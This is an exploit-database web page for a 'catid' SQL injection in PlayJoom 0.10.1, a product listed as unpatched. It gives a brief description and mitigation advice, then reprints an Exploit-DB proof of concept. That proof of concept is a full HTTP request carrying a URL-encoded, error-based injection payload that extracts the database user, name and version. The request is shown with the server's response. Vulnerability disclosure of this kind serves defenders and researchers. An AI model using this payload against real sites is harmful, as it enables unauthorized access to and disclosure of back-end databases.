header-logo
Suggest Exploit
vendor:
PlayJoom
by:
Ihsan Sencan
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PlayJoom
Affected Version From: 0.10.1
Affected Version To: 0.10.1
Patch Exists: NO
Related CWE: N/A
CPE: a:playjoom:playjoom:0.10.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

PlayJoom 0.10.1 – ‘catid’ SQL Injection

PlayJoom is vulnerable to SQL injection. An attacker can send a specially crafted HTTP request to the application to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'catid' parameter of the 'index.php' script. This can be exploited to disclose the content of the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: PlayJoom 0.10.1 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-11-07
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://playjoom.telgo.info/
# Software Link: https://ayera.dl.sourceforge.net/project/playjoom/0.10.1/playjoom-0.10.1-install_package.zip
# Version: 0.10.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?option=com_playjoom&view=genre&catid=[SQL]
# 
GET /[PATH]/index.php?option=com_playjoom&view=genre&catid=%32%20%41%4e%44%20%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 348175763341e76e6aadad3ee54838ec=en-GB; PHPSESSID=macg4h63q378u11758a1pslek7; 7464bee77ffeb893cc3113afbb45f7b3=g63a0tdt8boftnmbbj2pgbt6t1; 348175763341e76e6aadad3ee54838ec=en-GB
Connection: keep-alive
HTTP/1.1 303 See other
Date: Tue, 06 Nov 2018 23:55:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Location: /[PATH]
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

Navigation

Suggest Exploit

Services By CQR